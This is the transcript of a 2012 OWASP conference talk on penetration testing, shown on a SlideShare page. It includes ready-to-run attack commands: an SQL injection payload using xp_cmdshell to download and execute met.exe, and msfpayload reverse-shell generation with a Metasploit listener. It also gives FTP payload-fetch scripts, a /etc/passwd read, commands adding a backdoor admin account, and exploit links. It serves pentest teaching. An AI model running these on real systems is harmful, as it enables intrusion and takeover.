• Save
Public exploit held private : Penetration Testing the researcher’s way
Upcoming SlideShare
Loading in...5
×
 

Public exploit held private : Penetration Testing the researcher’s way

on

  • 815 views

This talk is about how to solve practical challenges faced during pen-testing and exploits. Will help you to understand how it can be done efficiently. Will explore various tips and tricks about it. ...

This talk is about how to solve practical challenges faced during pen-testing and exploits. Will help you to understand how it can be done efficiently. Will explore various tips and tricks about it. It will try to solve the common questions like:

0. How do I prepare? What kind of tools I should have?
1. I need to scan the entire network in a faster way?
2. How can I get more accurate results for scanning and fingerprinting?
3. Nessus says it is vulnerable but how can I exploit?
4. What if I know it is vulnerable but I don’t have any exploits available?
5. I am inside the box, compromised it, now what to do?

In short, it will show you the pain points of a typical pen-testing exercise how to deal with it and will help you to reach to “42”, the answer to life, the universe and everything.

Statistics

Views

Total Views
815
Views on SlideShare
741
Embed Views
74

Actions

Likes
1
Downloads
0
Comments
0

3 Embeds 74

http://tbasu.com 41
http://www.linkedin.com 25
https://www.linkedin.com 8

Accessibility

Categories

Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

    Public exploit held private : Penetration Testing the researcher’s way Public exploit held private : Penetration Testing the researcher’s way Presentation Transcript

    • OWASP InfoSec India Conference 2012August 24th – 25th, 2012 The OWASP FoundationHotel Crowne Plaza, Gurgaon http://www.owasp.orghttp://www.owasp.in Public exploit held private : Penetration Testing the researcher’s way Tamaghna Basu GCIH, OSCP, RHCE, CEH, ECSA tamaghna.basu@gmail.com OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
    • DISCLAIMER! This presentation contains materials on the evolutionof a pen tester which is solely based on theperspective of the speaker which might contradictwith opinions of individuals.All the scenarios explained here are fictional eventhough they might resemble to realistic situations.Even though no harm intended, if it causes anydiscomfort to you spiritually and/or physically, thespeaker, organizers, hotel authority, climate controlpeople and the person sitting next to you will not beresponsible for that. OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 2
    • Setting the contextWhy Pentesting?How do you do it? To VA or to PT… That’s the question. OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 3
    • Setting the context Terminologies  Vulnerability  Exploit  Payload  Reverse shell OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 4
    • BasicsPentesting  Internal  External  Automated -> review the report -> get the final report  Manual -> run few basic tools -> get the report done OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 5
    • Basics…Pentesting Steps  Recon and Scanning  Exploit  Maintain Access  Clean up OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 6
    • ScanningWhy?  Identify the live hosts  OS fingerprinting  Service fingerprinting OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 7
    • ScanningDesi Jugaad  Ping sweep / shell scripts Decent tools (But indecent usage)  NMAP (behold the power of NSE)  Others? OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 8
    • Desi Jugaad (Local Hack)Ping SweepWindowsFOR /L %i in (1,1,255) do @ping -n 1 192.168.153.%i | find "Reply“ Linux #!/bin/bash for ip in $(seq 1 254); do ping -c 1 192.168.15.$ip | grep "bytes from" | cut -d" " -f 4 | cut -d":" -f 1 & done OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 9
    • ScanningProblem!  It is taking too long to scan, need to go for lunch…  Is it really a windows box but looks like a Linux box? Or which version? OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 10
    • Desi Jugaad Nmap  nmap –sV 192.168.15.201  nmap –O 192.168.15.201  nmap –A 192.168.15.201  nmap –p 1-65535 –sV 192.168.15.201  Nmap –p T:80 192.168.15.200-250  Zenmap Unicorn scan - us -H -msf -Iv 192.168.13.201 -p 1- 65535 OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
    • Nmap Scripts/usr/locale/share/nmap/scripts OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 12
    • Nmap Scripts• Shared files and folders • nmap --script=smb-enum-shares 192.168.80.129• Check for SMB vulnerabilities • nmap --script=smb-check-vulns 192.168.80.129• Scan for machines that use default Ms sql username,password • nmap --script=ms-sql-info 192.168.80.129 OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 13
    • ScanningI have Nessus. Why to go through so much pain?I don’t have Nessus. What to do? OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 14
    • Exploit Motive  To gain access  Data  Command execution  Destroy everything! Categories  Service level  OS OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 15
    • ExploitWhat to exploit?  FTP?  HTTP?  SNMP?  What else? OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 16
    • Exploit FTP  Server Exploit – Buffer Overflow  Fuzzing???  BruteforceSNMP  What to do? OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 17
    • FTP TipsWindowsecho open 192.168.12.124 > ftp.txtecho ftp>> ftp.txtecho ftp>> ftp.txtecho bin >> ftp.txtecho get met2.exe >> ftp.txtecho bye >> ftp.txtftp -s:ftp.txt OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 18
    • FTP TipsLinuxecho quote user ftp>> ftp.txtquote user ftpecho quote pass ftp>>ftp.txtecho verbose>>ftp.txtecho binary >> ftp.txtecho get exploit.c >> ftp.txtecho bye >> ftp.txtcat ftp.txt|ftp -n 192.168.12.124 OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 19
    • Exploit HTTP  Server Exploit  Command Execution  Web Shells  SQLi OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 20
    • HTTPOWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 21
    • SQLi Tips or 1=1;exec master..xp_cmdshell echo open 192.168.12.124> ftpmet.txt;exec master..xp_cmdshell echo test>> ftpmet.txt;exec master..xp_cmdshell echo test>> ftpmet.txt;exec master..xp_cmdshell echo bin>> ftpmet.txt;exec master..xp_cmdshell echo get met.exe>> ftpmet.txt;exec master..xp_cmdshell echo bye;exec master..xp_cmdshell ftp - s:ftpmet.txt;exec master..xp_cmdshell met.exe;-- OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 22
    • SQLi TipsMy SQL non-interactive  "mysql --host=127.0.0.1 --user=root -- password=‘password -e "use mysql; show tables;"  "mysql --host=127.0.0.1 --user=root -- password=‘password -e "SELECT LOAD_FILE(/etc/passwd) INTO dumpfile /tmp/passwd;" OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 23
    • Exploit Metasploit  Use Exploit  Set payload  exploit Any other options?How about writing own exploit (at free time) (out of scope) OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 24
    • L33t love story Exploit’s love letter to the machine  PAYLOAD…Which courier?  MSF – set payload  Custom program – msfpayload  Bad characters  Executable - msfpayload OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 25
    • Payload Generator meterpreter msfpayload options: ./msfpayload windows/meterpreter/reverse_tcp O Create exe: ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.14.15 LPORT=4321 X > /var/ftp/met.exe Generate shellcode: ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.14.15 LPORT=4321 C OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 26
    • From msf: use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.40 set LPORT 80 show options exploit OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 27
    • ExploitI am in, what to do?  Secure access?  Add user  Open a port  I like it the reverse way  meterpreter  Dude, did you get root/admin acces? OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 28
    • Add User Windows Shell net user hacker hacker123 /add net localgroup administrators hacker /add Meterpreter use incognito add_user hacker hacker123 add_localgroup_user Administrators hacker RDP enable reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSet ControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 29
    • Privilege Escalation Categories  Service level  OSProblem!  How can I transfer my exploit there?  Netcat  FTP OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 30
    • Kernel Exploits Linux Kernel <= 2.6.36-rc8 http://www.exploit- db.com/exploits/15285/ Linux Kernel 2.4/2.6 http://www.exploit- db.com/exploits/9545/ Linux Kernel 2.6 http://www.exploit- db.com/exploits/8478/ Linux Kernel 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 http://www.exploit-db.com/exploits/9844/ OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 31
    • Windows Exploits Windows Vista, 7, 2008 http://www.exploit- db.com/exploits/15609/ Windows XP, 2003 http://www.exploit- db.com/exploits/18176/ Linux + NT priv esc http://www.exploit- db.com/exploits/9301/ Windows XP SP2, SP3 http://www.exploit- db.com/exploits/9301/ OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 32
    • Pivoting… Huh?Why do I need it?How do I do it?  nc + port forwarding  Ssh tunneling OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 33
    • Fuzzing… My favorite but last thing I prefer to do on my own  Python rocks!  Basic  Advanced  SEH handler  Egg hunting shellcode OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 34
    • Did I miss anything? Questions Perspectives Comments tamaghna.basu@gmail.com twitter.com/titanlambda linkedin.com/in/tamaghnabasu OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 35
    • Thank you tamaghna.basu@gmail.com twitter.com/titanlambda linkedin.com/in/tamaghnabasu 36OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)